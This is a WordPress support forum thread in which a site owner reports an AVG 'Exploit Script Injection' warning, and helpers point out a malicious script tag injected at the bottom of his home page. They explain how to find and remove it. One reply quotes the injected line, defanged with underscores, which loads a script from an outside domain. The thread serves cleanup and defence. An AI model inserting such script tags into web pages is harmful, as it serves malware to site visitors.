Title: Exploit Script Injection (type 1573)
Last modified: August 19, 2016

---

# Exploit Script Injection (type 1573)

 *  [mandrakeman](https://wordpress.org/support/users/mandrakeman/)
 * (@mandrakeman)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/exploit-script-injection-type-1573/)
 * Hi,
 * I originally built the [http://www.marinecourtapartment.co.uk](http://www.marinecourtapartment.co.uk)
   site about a year ago and for sometime it’s been ok with the periodic updates
   to WordPress, until now. I’m running 3.0.1. with the Atahualpa skin – which does
   need updating, but it says i’ll lose the – many – changes i’ve made if i do, 
   which seems pretty crap. I’m sure there must be a way around that, so if you 
   know of step-by-step instructions.
 * Anyway, AVG generates an ‘Exploit Script Injection (type 1573)’. I’m not really
   up on databases and WordPress generally, I tend to just code HTML and PHP sites,
   so all step-by-step help appreciated.
 * It is now both hard to get on to the site and to get to the log-in screen. The
   other error comes up as 94.136.40.103 which is an ISP address i’m guessing that
   rogue code is trying to access.
 * Any help with this very annoying issue would be very much appreciated.
 * Thanks
 * Chris
 * p.s. Whilst I’m at it, i don’t have ALTER-rights, how do i change that, i’m guessing
   with the server provider?
 * p.p.s. i use both Firefox & Explorer, this issue arises with both.

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [Mark](https://wordpress.org/support/users/wpsec/)
 * (@wpsec)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/exploit-script-injection-type-1573/#post-1633783)
 * At the bottom of your home page there is a script embedded, like this:
 * `<script src="http://______onlineisdudescars.com/co.php"></script>`
 * I added the underscores into the URL to somewhat disable it.
 * Anyway, I think you need to find that code and get rid of it. Check your footer.
   php file in your theme, or you index.php file if you don’t have a footer file.
   If it’s not there, it might be in a plugin or in your database.
 *  Moderator [James Huff](https://wordpress.org/support/users/macmanx/)
 * (@macmanx)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/exploit-script-injection-type-1573/#post-1633867)
 * After clearing out the line that M mentioned, carefully follow [this guide](http://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](http://codex.wordpress.org/Hardening_WordPress).

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Exploit Script Injection (type 1573)’ is closed to new replies.

## Tags

 * [AVG](https://wordpress.org/support/topic-tag/avg/)

 * In: [Hacks](https://wordpress.org/support/forum/plugins-and-hacks/hacks/)
 * 2 replies
 * 3 participants
 * Last reply from: [James Huff](https://wordpress.org/support/users/macmanx/)
 * Last activity: [15 years, 9 months ago](https://wordpress.org/support/topic/exploit-script-injection-type-1573/#post-1633867)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics